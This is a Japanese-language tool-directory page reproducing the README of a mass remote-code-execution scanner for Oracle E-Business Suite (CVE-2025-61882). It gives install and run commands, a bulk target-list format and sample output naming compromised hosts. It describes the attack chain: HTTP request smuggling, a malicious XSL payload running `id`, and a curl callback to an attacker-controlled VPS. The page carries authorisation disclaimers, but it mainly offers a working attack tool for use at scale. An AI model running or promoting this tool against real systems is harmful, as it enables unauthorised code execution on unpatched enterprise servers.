Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-61882 — マルチスレッド対応のCVE-2025-61882スキャナーで、Oracle E-Business Suiteを対象とし、HTTPリクエストスマグリングを悪用して認証なしのリモートコード実行を達成し、コマンド出力で検証します。 | Kitploit
ツール/GitHubGitHub/sachinart/cve-2025-61882
偵察脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubsachinart/cve-2025-61882

CVE-2025-61882

マルチスレッド対応のCVE-2025-61882スキャナーで、Oracle E-Business Suiteを対象とし、HTTPリクエストスマグリングを悪用して認証なしのリモートコード実行を達成し、コマンド出力で検証します。

リポジトリを見る
11710ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Oracle E-Business Suite RCE スキャナー (CVE-2025-61882)

Oracle E-Business Suite インストール環境における CVE-2025-61882 を検出するための、高速でマルチスレッド対応の一括スキャナーです。この重大な脆弱性により、認証なしのリモートコード実行が可能になります。

Python Version License CVE

🎯 特徴

  • 一括スキャン - ファイルから数百〜数千のターゲットを処理
  • マルチスレッド - 同時スキャン数を設定可能(デフォルト: 20スレッド)
  • 自動検出 - id コマンドを実行し、出力を解析して RCE を検証
  • リアルタイム結果 - 脆弱なターゲットは即座に vuln-output.txt に書き込まれます
  • ランダムポート - 競合を避けるため、各ターゲットにランダムなポート(2000〜9999)を使用
  • クリーンな出力 - ノイズを最小限に抑えた進捗状況の表示

📋 必要条件

root@kitploit:~
pip install requests

これだけです。Python 3.7+ と requests ライブラリのみ必要です。

🚀 インストール

root@kitploit:~
git clone https://github.com/Sachinart/CVE-2025-61882.git
cd CVE-2025-61882
pip install -r requirements.txt

💻 使用方法

基本スキャン

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP

高速スキャン(50スレッド)

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 50

慎重なスキャン(10スレッド)

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 10

📝 ターゲットファイル形式

1行に1つのURLを記載した targets.txt ファイルを作成します:

root@kitploit:~
http://oracle-ebs1.example.com:8000
https://oracle-ebs2.example.com:443
http://192.168.1.100:8001
https://apps.company.com

📊 出力例

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║   Oracle E-Business Suite RCE Scanner (CVE-2025-61882)       ║
╚═══════════════════════════════════════════════════════════════╝

[*] Loaded 1235 targets from file
[*] Running with 20 concurrent threads
[*] Vulnerable hosts will be saved to vuln-output.txt

[*] [1/1235] Checking https://target1.com:443 on port 7893
[*] [2/1235] Checking https://target2.com:443 on port 5882

[+] Got one! 129.146.56.43 is vulnerable
[+] Command output: uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)

=================================================================
[*] Scan finished in 245.67 seconds
[*] Found 3 vulnerable target(s)
[*] Check vuln-output.txt for full results
=================================================================

[+] Vulnerable targets found:

    129.146.56.43 → uid=54321(oracle) gid=54321(oinstall)
    192.168.1.50 → uid=1000(applmgr) gid=1000(dba)
    10.0.0.100 → uid=500(oracle) gid=500(oinstall)

📄 出力ファイル

結果は vuln-output.txt に保存されます:

root@kitploit:~
# Oracle EBS CVE-2025-61882 - Scan Results
# Started: Tue Oct 07 15:30:45 2025
# Total targets: 1235
# Scanner by: Chirag Artani

129.146.56.43 | uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
192.168.1.50 | uid=1000(applmgr) gid=1000(dba) groups=1000(dba)
10.0.0.100 | uid=500(oracle) gid=500(oinstall) groups=500(oinstall)

🔍 動作の仕組み

  1. CSRFトークン取得 - ターゲットから有効な CSRF トークンを取得
  2. HTTPリクエストスマグリング - スマグリング脆弱性を悪用して悪意のあるペイロードを注入
  3. XSLペイロード配信 - コマンドを実行する悪意のある XSL スタイルシートを配信
  4. コールバック検証 - ターゲットが id コマンドを実行し、curl 経由で出力を送信
  5. 正規表現マッチング - uid=...gid=... パターンを確認して RCE の成功を検証

⚙️ 設定

🔒 責任ある開示

このツールは許可されたセキュリティテスト専用です。常に:

  • ✅ テスト前に書面による許可を取得する
  • ✅ 自分が所有する、または明示的なテスト許可があるシステムのみをスキャンする
  • ✅ 発見事項を影響を受ける組織に責任を持って報告する
  • ✅ 調整された脆弱性開示の慣行に従う
  • ❌ 許可のないシステムには絶対に使用しない

コンピュータシステムへの不正アクセスは違法です。

🐛 既知の問題

  • ファイアウォール/IDS によるブロックで一部のターゲットがタイムアウトする場合があります
  • コールバック検出には、ターゲットがランダムポートで VPS に到達できる必要があります
  • SSL 証明書の警告は抑制されます(ペンテストでは想定内)

🤝 貢献

バグを発見しましたか? 機能リクエストがありますか?

  1. リポジトリをフォークする
  2. 機能ブランチを作成する (git checkout -b feature/amazing-feature)
  3. 変更をコミットする (git commit -m 'Add some feature')
  4. ブランチにプッシュする (git push origin feature/amazing-feature)
  5. プルリクエストを開く

📜 ライセンス

このプロジェクトは MIT ライセンスの下でライセンスされています。詳細は LICENSE ファイルを参照してください。

⚠️ 免責事項

このツールは、教育目的および許可されたセキュリティテスト専用に提供されています。作者は、このツールの誤用または損害について一切の責任を負いません。自己責任で使用してください。

📚 参考情報

  • CVE-2025-61882 詳細
  • Oracle Critical Patch Update

👨‍💻 Developed by Chirag Artani

Website • Twitter • LinkedIn

Made with ❤️ for the infosec community

ツールをダウンロード
引数必須デフォルト説明
--targetsはい-ターゲットURLを含むファイルへのパス
--lhostはい-あなたの VPS/攻撃者 IP アドレス
--threadsいいえ20同時スレッド数